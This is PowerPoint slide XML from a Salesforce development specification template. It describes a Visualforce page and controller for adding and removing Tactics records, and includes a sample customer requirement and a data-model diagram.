                <a:gs pos="100000">
                  <a:srgbClr val="3087D1">
                    <a:alpha val="74001"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:path path="rect">
                <a:fillToRect r="100000" b="10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r>
                <a:rPr lang="fr-FR"/>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65559" name="Rectangle 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2210" y="1716"/>
              <a:ext cx="112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fr-FR" sz="1600"/>
                <a:t>Getters</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="95000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1000"/>
                <a:t>AccountList</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65543" name="AutoShape 68"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3014663" y="4445000"/>
            <a:ext cx="319405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73000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3087D1">
                  <a:alpha val="74001"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fr-FR"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65544" name="Rectangle 69"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3027363" y="4554538"/>
            <a:ext cx="3167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/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600"/>
              <a:t>Setters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1000"/>
              <a:t>searchWord</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65545" name="AutoShape 71"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3014663" y="1747838"/>
            <a:ext cx="3194050" cy="692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73000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="3087D1">
                  <a:alpha val="74001"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fr-FR"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65546" name="Rectangle 72"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2986088" y="1858963"/>
            <a:ext cx="32496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/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600"/>
              <a:t>Actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t>searchAction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="65547" name="AutoShape 76"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65560" idx="0"/>
            <a:endCxn id="65545" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="1375569" y="2018507"/>
            <a:ext cx="1563687" cy="171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48" name="AutoShape 77"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65540" idx="3"/>
            <a:endCxn id="65562" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6208713" y="4349750"/>
            <a:ext cx="1647825" cy="18129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49" name="AutoShape 78"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65558" idx="3"/>
            <a:endCxn id="65562" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6207125" y="3435350"/>
            <a:ext cx="569913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50" name="AutoShape 79"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65560" idx="3"/>
            <a:endCxn id="65543" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2379663" y="4003675"/>
            <a:ext cx="635000" cy="787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51" name="AutoShape 80"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65543" idx="3"/>
            <a:endCxn id="65562" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6208713" y="4003675"/>
            <a:ext cx="568325" cy="787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52" name="AutoShape 81"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65558" idx="1"/>
            <a:endCxn id="65560" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2379663" y="3435350"/>
            <a:ext cx="63500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53" name="AutoShape 82"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65540" idx="1"/>
            <a:endCxn id="65560" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="1300163" y="4349750"/>
            <a:ext cx="1714500" cy="18129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554" name="AutoShape 83"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="65545" idx="3"/>
            <a:endCxn id="65562" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6208713" y="2093913"/>
            <a:ext cx="1647825" cy="15636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55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7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Flow Page / Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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Page description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716463" y="1600200"/>
            <a:ext cx="4248150" cy="4876800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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571500" indent="-1905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6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Loading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olidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Here is defined the loading gray div</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" b="1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6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200"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6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>« FROM »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Add links launch hideIt() and areUSure_Remove()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pageBlockTable lists all the Tactics given by the request that are not listed in the TO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isL!imitReached outputText warns the users if there were too much rows returned by the query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fr-FR" sz="1100">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:sym typeface="Arial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6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>« SEARCH »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 b="1">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>he selectList allows the user to define the type of filter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inputText allws the user to set the filter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OK button lanch hideIt() on click and showIt() on complete. It rerenders the FROM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100">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The following actionFunctions are defined : removeIt, addIt, removeAll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fr-FR" sz="1100" b="1">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/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gray">
          <a:xfrm>
            <a:off x="179388" y="1600200"/>
            <a:ext cx="43211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4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>Javascript functions SECTION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Function areUSure_Remove</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="2" indent="-101600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t>If the users clicks on remove, a confirm alert asks the users to cancel or continue toward the ActionFunction removeIt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Function areUSure_RemoveAll</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="2" indent="-101600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t>If the users clicks on the remove all button, a confirm alert asks the users to cancel or continue toward the ActionFunction removeAll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Function hideIt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="2" indent="-101600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t>Function that hide the gray div that is displayed during loading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Function showIt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="2" indent="-101600">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000"/>
              <a:t>Function that shows the gray div preventing the user to click on a link during loading</a:t>
            </a:r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4"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1"/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4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>« TO » SECTION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The removeAll Button launches hideIt() and areUSure_RemoveAll() on click and launches showIt() on complete. This button is disabled if there is no lines to remove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The Remove links launch hideIt() and areUSure_Remove()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100"/>
              <a:t>The pageBlockTable lists all the Tactics related to the object</a:t>
            </a:r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4"/>
              </a:buBlip>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="190500" indent="-190500">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1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>
          <a:xfrm>
            <a:off x="4716463" y="1524000"/>
            <a:ext cx="4248150" cy="5334000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/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571500" indent="-1905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rgbClr val="6B6B6B"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId3"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>METHODS SECTION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200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>addIt : create a Tactics Intertable and attach it to the right Tactics and Object (depending on the URL informations and on which Tactics the user clicked the ‘Add’ button). There is a particularity with the opportunities : more than one Tactics will be accepted only if the Opportunity is a Multi Product opportunity (record type)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200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>removeIt : delete the Tactics Intertable relative to the right Tactics and Object (depending on the URL informations and on which Tactics the user clicked the ‘Remove’ button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rgbClr val="E00000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200">
                <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>removeAll : remove all Tactics related to the Id given in the URL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fr-FR" sz="1200">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:sym typeface="Arial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</a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1200" b="1">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:sym typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5143500" y="5257800"/>
            <a:ext cx="2400300" cy="7508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solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TEST Coverage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>100%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9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Controller description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b="1" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67591" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="323850" y="1524000"/>
            <a:ext cx="42481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fr-FR" sz="1400"/>
              <a:t>CONSTRUCTOR SECTION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NA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="190500" indent="-190500">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400"/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fr-FR" sz="1400"/>
              <a:t>GLOBAL SECTION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rowDisplayLimit can be changed to change the number of rows displayed during the Tactics search</a:t>
            </a:r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endParaRPr lang="fr-FR" sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="190500" indent="-190500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fr-FR" sz="1400"/>
              <a:t>GETTER SECTION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getisURLValid valids the URL and send true (renders the page) to the page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getItems does not contain any hard coded value : you can change the list values by changing the appropriate labels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getisLimitReached : if the number of rows given by the search is equal to rowDisplayLimit, a message appears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getnumberOfTactics is used to control the remove all button appearance (gray or not)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getTactics_Objects_FROM : controls the rows retrieved during the search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" lvl="1" indent="-190500">
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="E00000"/>
              </a:buClr>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200"/>
              <a:t>getTactics_Objects_TO : retrieves the Tactics related to the object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838200" y="2667000"/>
          <a:ext cx="7370763" cy="2014538"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s1034" name="Worksheet" r:id="rId4" imgW="6248499" imgH="1714446" progId="Excel.Sheet.8">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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325438" y="304800"/>
            <a:ext cx="8818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Visualforce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="130000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Custom Labels</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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&lt;PAD Spec – introduction&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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Goal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Create a document that will present </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>everything required </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to develop, without requiring any other knowledge of the project : the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>minimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> needed, all what is just needed.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Based on that document, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>any developer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will be able to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document will describe all developments, and for each one just the useful items.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609600" y="1676400"/>
            <a:ext cx="8035925" cy="3454400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>&lt;PAD/Spec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sample2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>&gt;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000" dirty="0" smtClean="0"/>
              <a:t>Business Requirement from your customer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1" dirty="0" smtClean="0"/>
              <a:t> “I would like to be able to change the account on a opportunity, displaying a list of accounts from the same account hierarchy”</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0"/>
            </a:b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000" dirty="0" smtClean="0"/>
              <a:t>How would you specify this requirement for the developer ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0"/>
            </a:b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65041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Context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96258" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509588" y="892175"/>
            <a:ext cx="8177212" cy="1498600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>Universal Container &amp; Packaging, LLC specializes in packaging, fulfilment and distribution, of virtually any type of retail and promotional merchandise, from customized packaging solutions and fulfilment to direct mail and promotional </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
              <a:t>products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="284163" indent="-284163" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>CRM has been upgraded with Salesforce </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Summer10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>version. The platform provides new enhancements which can be leveraged to change CRM configuration with 2 objectives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669925" lvl="1" indent="-195263" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Make the configuration simpler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="669925" lvl="1" indent="-195263" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Deploy new functionalities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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830020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4800" y="0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Planning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean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26294" y="2060848"/>
            <a:ext cx="6054725" cy="3048000"/>
            <a:chOff x="986" y="1488"/>
            <a:chExt cx="3814" cy="192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86" y="1488"/>
              <a:ext cx="3814" cy="1920"/>
              <a:chOff x="748" y="1025"/>
              <a:chExt cx="4990" cy="2881"/>
            </a:xfrm>
          </p:grpSpPr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1048"/>
                <a:ext cx="4990" cy="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770" y="1025"/>
                <a:ext cx="4850" cy="27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2"/>
                  </a:buClr>
                  <a:buSzPct val="130000"/>
                  <a:buFontTx/>
                  <a:buChar char="»"/>
                </a:pPr>
                <a:endParaRPr lang="en-GB" sz="1400" b="1"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp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1488"/>
              <a:ext cx="3693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82299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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3275856" y="2709839"/>
            <a:ext cx="792088" cy="287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OwnerId</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Data Model</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 127"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427984" y="2492896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4427984" y="2637359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Account Owner</a:t>
            </a:r>
          </a:p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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Account Name</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="0"/>
            <a:endCxn id="9" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5336828" y="2357959"/>
            <a:ext cx="504032" cy="773906"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -45354"/>
              <a:gd name="adj2" fmla="val 129538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28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6328048" y="2637360"/>
            <a:ext cx="1368152" cy="3595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ParentId</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 127"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427984" y="3861049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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opportunity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14" name="Rectangle 128"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4427984" y="4005512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/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="900" b="1" dirty="0" smtClean="0"/>
              <a:t>Id</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Elbow Connector 15"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="0"/>
            <a:endCxn id="9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4949615" y="3608773"/>
            <a:ext cx="504552" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5292080" y="3429000"/>
            <a:ext cx="1368152" cy="3595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/>
              <a:t>AccountId</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 127"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
